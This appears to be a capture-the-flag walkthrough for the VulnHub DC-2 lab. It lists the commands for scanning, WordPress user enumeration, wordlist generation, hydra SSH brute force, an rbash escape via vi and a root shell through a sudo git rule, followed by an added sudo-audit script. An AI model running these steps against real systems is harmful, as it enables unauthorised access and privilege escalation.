Machine Link : https://www.vulnhub.com/entry/dc-2,311/

STEP1
nmap 192.168.0.131 -sSV -A -p- -vv
FINDING
PORT 80 IS OPEN
SSH IS RUNNING ON PORT 7744
-----------------------------------------------------------------------------------------------------------
STEP2
ADD dc-2 TO THE HOSTS FILE
nano /etc/hosts
SAVE IT
-----------------------------------------------------------------------------------------------------------
STEP3
OPEN SITE IN BROWSER
HTTP://dc-2
FINDING
IT IS A WORDPRESS SITE
GO TO THE FLAG TAB TO GET THE FLAG
IT SAYS: FOR THE PASSWORD WORDLIST USE CEWL TO GENERATE PASSWORDS
-----------------------------------------------------------------------------------------------------------
STEP4
FIRST, TO GET USER NAMES USE
wpscan --url http://dc-2 -e at -e ap -e u
admin
jerry
tom
SAVE IT IN dc-2users.txt
-----------------------------------------------------------------------------------------------------------
STEP5
TO GENERATE PASSWORDS FOR THE SITE
cewl http://dc-2 -w pdc3.txt
-----------------------------------------------------------------------------------------------------------
STEP6
TO BRUTEFORCE SSH USE HYDRA WITH
hydra -L /root/Desktop/dc-2users.txt -P /root/Desktop/pdc3.txt -s 7744 192.168.0.131 ssh
GOT ONLY ONE PASSWORD
[7744][ssh] host: 192.168.0.131 login: tom password: parturient
-----------------------------------------------------------------------------------------------------------
STEP7
LET'S USE dirsearch TO FIND THE LOGIN PAGE FOR THE WORDPRESS SITE
dirsearch -u http://dc-2
FINDING
http://dc-2/wp-login.php
-----------------------------------------------------------------------------------------------------------
STEP8
TO GET PASSWORDS FOR THE OTHER USERS USE
wpscan --url http://dc-2 -U /root/Desktop/dc-2users.txt -P /root/Desktop/pdc3.txt
[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
-----------------------------------------------------------------------------------------------------------
STEP9
NOW SSH
ssh [email protected] -p 7744
-rbash IS THE SHELL, NO COMMAND WILL WORK, SO ESCAPE THE SHELL TO bash OR sh

TO ESCAPE FROM rbash TO A STABLE SHELL
vi
:set shell=/bin/sh
:shell

TO GET CURRENT PATH
$PATH
/bin/bash
echo $PATH
export PATH=/bin/:/usr/bin/:/usr/local/bin:$PATH
whoami
tom

CHANGE USER
su jerry (pwd- adipiscing)
jerry@DC-2:/home/tom$ sudo -l
IT WILL SHOW
(root) NOPASSWD: /usr/bin/git

THEN
https://gtfobins.github.io/gtfobins/git/#shell
jerry@DC-2:/home/tom$ sudo /usr/bin/git branch --help config
THEN TYPE
!/bin/sh
whoami
root
-----------------------------------------------------------------------------------------------------------
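
The `(root) NOPASSWD: /usr/bin/git` rule shown by `sudo -l` is the misconfiguration that ends in a root shell here. The function below is an added example, not part of the original notes: it audits `sudo -l` output for rules of that kind. The ESCAPABLE list, the output format and the sample input are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original notes): flag sudo rules that allow a
# root shell through a program's built-in shell escape (pager or editor).
# ESCAPABLE is a short, constructed sample list, not a complete inventory.
ESCAPABLE="git vi vim less more man find awk env tar perl"

# Reads `sudo -l` output on stdin; prints "<runas> <auth> <command> <reason>"
# for every risky rule. <auth> is NOPASSWD or PASSWD.
audit_sudo_rules() {
    while IFS= read -r line; do
        rule=$(printf '%s\n' "$line" | sed 's/^[[:space:]]*//')
        case "$rule" in "("*")"*) ;; *) continue ;; esac   # rule lines only
        runas=${rule#\(}; runas=${runas%%\)*}
        runas=$(printf '%s' "$runas" | tr -d ' ')
        rest=${rule#*\)}
        auth=PASSWD
        case "$rest" in *NOPASSWD:*) auth=NOPASSWD ;; esac
        # Drop tags such as "NOPASSWD:" or "SETENV:", keep the command list.
        cmds=$(printf '%s\n' "$rest" | sed 's/[A-Z_][A-Z_]*:[[:space:]]*//g')
        set -f; old_ifs=$IFS; IFS=,        # split the list on commas, no globbing
        for cmd in $cmds; do
            IFS=$old_ifs
            cmd=$(printf '%s\n' "$cmd" | sed 's/^[[:space:]]*//')
            bin=${cmd%% *}; name=${bin##*/}    # path without args, then basename
            if [ "$bin" = "ALL" ]; then echo "$runas $auth ALL unrestricted"; continue; fi
            for e in $ESCAPABLE; do
                if [ "$name" = "$e" ]; then echo "$runas $auth $bin shell-escape"; fi
            done
        done
        IFS=$old_ifs; set +f
    done
}

# Constructed sample input: the first rule is the one from STEP9, the second
# is made up to show a comma-separated rule that still requires a password.
sample_sudo_l() {
    cat <<'EOF'
User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
    (root) /sbin/reboot, /usr/bin/less /var/log/syslog
EOF
}

sample_sudo_l | audit_sudo_rules
```

On a real host, feed it `sudo -l -U <user>` output for each account; any NOPASSWD line it prints should be removed from sudoers or replaced with a wrapper script that takes no user-controlled arguments.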